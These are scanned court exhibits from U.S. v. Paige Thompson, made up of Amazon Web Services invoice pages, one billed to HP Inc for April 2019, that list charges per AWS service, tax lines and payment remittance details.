| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |
| AWS Data Transfer | $427.32 |
| Charges | $395.67 |
| VAT ** | $0.00 |
| CT | $31.65 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 920
Admitted________________

| | |
|---|---|
| VAT ** | $0.00 |
| CT | $0.00 |
| Amazon Relational Database Service | $421.46 |
| Charges | $390.24 |
| VAT ** | $0.00 |
| CT | $31.22 |
| Amazon Elastic Compute Cloud | $1,881.73 |
| Charges | $6,950.61 |
| Credits | ($5,208.27) |
| VAT ** | $0.00 |
| CT | $139.39 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Service Provider:**
**(Not to be used for payment remittance)**
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

# EXHIBIT 921



Account number:
6068

Bill to Address:
HP Inc
ATTN: Benita Fairbairn
HP Inc, Call Box 42000
Aguadilla , PR , 00605 , PR

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 4725 |
| | Please include this invoice number with your payment |
| Invoice Date: | May 3 , 2019 |
| PO Number: | HPI3102351 |
| **TOTAL AMOUNT DUE ON June 2 , 2019** | **$573,703.66** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $573,703.66 |
| Charges | $573,419.88 |
| Credits | ($9.80) |
| Tax * | $292.97 |
| Government Fees and Taxes, Other Fees and Monthly Charges (Telecommunications) | $0.61 |
| Total for this invoice | $573,703.66 |

| Detail for Consolidated Bill | |
|---|---|
| AWS Transfer for SFTP | $580.79 |
| Charges | $580.79 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Secrets Manager | $417.15 |
| Charges | $417.15 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 921
Admitted________________

| | |
|---|---|
| CT | $0.00 |
| Amazon SimpleDB | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon QuickSight | $242.16 |
| Charges | $242.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon CloudSearch | $44.98 |
| Charges | $44.98 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS IoT | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Translate | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Direct Connect | $65.85 |
| Charges | $65.85 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Neptune | $2,530.58 |
| Charges | $2,530.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Redshift | $17,530.57 |
| Charges | $17,530.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AmazonCloudWatch | $11,040.59 |
| Charges | $11,040.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.02 |
| CT | $0.00 |
| AWS RoboMaker | $0.00 |
| Charges | $4.29 |
| Credits | ($4.29) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Athena | $1,263.10 |
| Charges | $1,263.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Database Migration Service | $1,041.51 |
| Charges | $1,041.51 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Lex | $0.22 |
| Charges | $0.22 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon GuardDuty | $275.58 |
| Charges | $275.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon SageMaker | $137.36 |
| Charges | $137.36 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Directory Service | $168.52 |
| Charges | $168.52 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon EC2 Container Service | $518.30 |
| Charges | $518.30 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS X-Ray | $0.91 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Charges | $0.91 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Cognito** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon EC2 Container Registry (ECR)** | **$325.81** |
| Charges | $325.81 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Cloud Map** | **$0.18** |
| Charges | $0.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Glue** | **$109.19** |
| Charges | $109.19 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Budgets** | **$4.76** |
| Charges | $4.76 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| Amazon API Gateway | $283.71 |
|---|---|
| Charges | $283.71 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| CloudWatch Events | $0.01 |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Route 53 | $484.51 |
| Charges | $480.23 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $4.28 |
| CT | $0.00 |
| Amazon Kinesis Analytics | $97.24 |
| Charges | $97.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $1,915.64 |
| Charges | $1,915.64 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Greengrass | $0.16 |
| Charges | $0.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| CT | $0.00 |
| AWS CloudTrail | $2,093.18 |
| Charges | $2,093.18 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon WorkSpaces | $2,567.71 |
| Charges | $2,567.71 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon WorkDocs | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AmazonWorkMail | $12.00 |
| Charges | $12.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Queue Service | $829.63 |
| Charges | $829.63 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Kinesis | $2,140.77 |
| Charges | $2,140.77 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Lambda** | **$1,891.66** |
| Charges | $1,891.65 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.01 |
| CT | $0.00 |
| **Amazon Simple Storage Service** | **$56,626.45** |
| Charges | $56,623.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $3.35 |
| CT | $0.00 |
| **Amazon Glacier** | **$155.72** |
| Charges | $155.72 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Sumerian** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$77,396.04** |
| Charges | $77,341.93 |
| Credits | ($5.51) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $59.62 |
| CT | $0.00 |
| **AWS Security Hub** | **$0.00** |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Systems Manager | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Lightsail | $16.65 |
| Charges | $15.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.85 |
| CT | $0.00 |
| Amazon Elastic Compute Cloud | $286,989.03 |
| Charges | $286,816.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $172.23 |
| CT | $0.00 |
| Amazon Connect | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Device Farm | $500.00 |
| Charges | $500.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Notification Service | $356.11 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Charges | $356.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.01 |
| CT | $0.00 |
| **AWS Config** | **$4,897.44** |
| Charges | $4,896.29 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $1.15 |
| CT | $0.00 |
| **Amazon Elastic File System** | **$811.75** |
| Charges | $811.75 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Contact Center Telecommunications (service sold by AMCS, LLC)** | **$3.59** |
| Charges | $2.98 |
| Government Fees and Taxes, Other Fees and Monthly Charges (Telecommunications) | $0.61 |
| **AWS Data Pipeline** | **$432.85** |
| Charges | $432.81 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.04 |
| CT | $0.00 |
| **Amazon ElastiCache** | **$20,820.21** |
| Charges | $20,779.62 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $40.59 |
| CT | $0.00 |
| **Amazon CloudFront** | **$4,286.19** |
| Charges | $4,276.68 |
| VAT ** | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| GST | $0.00 |
| Estimated US sales tax to be collected | $9.51 |
| CT | $0.00 |
| Amazon Virtual Private Cloud | $1,023.07 |
| Charges | $1,023.07 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Data Transfer | $46,157.20 |
| Charges | $46,156.99 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.21 |
| CT | $0.00 |
| Amazon Machine Learning | $1.77 |
| Charges | $1.77 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Email Service | $67.35 |
| Charges | $67.35 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Step Functions | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic MapReduce | $1,079.10 |
| Charges | $1,079.10 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:
ABA Routing Number:
Wire Routing Number:
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon DynamoDB | $10,415.46 |
| Charges | $10,415.12 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.34 |
| CT | $0.00 |
| Amazon MQ | $1,166.97 |
| Charges | $1,166.97 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Polly | $0.01 |
| Charges | $0.01 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Registrar | $46.00 |
| Charges | $46.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS AppSync | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS CloudHSM | $2,716.54 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| Charges | $2,716.54 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS IoT Device Management** | **$0.24** |
| Charges | $0.24 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS WAF** | **$806.79** |
| Charges | $806.79 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elasticsearch Service** | **$6,051.87** |
| Charges | $6,051.87 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Rekognition** | **$0.42** |
| Charges | $0.42 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DocumentDB (with MongoDB compatibility)** | **$463.60** |
| Charges | $463.60 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
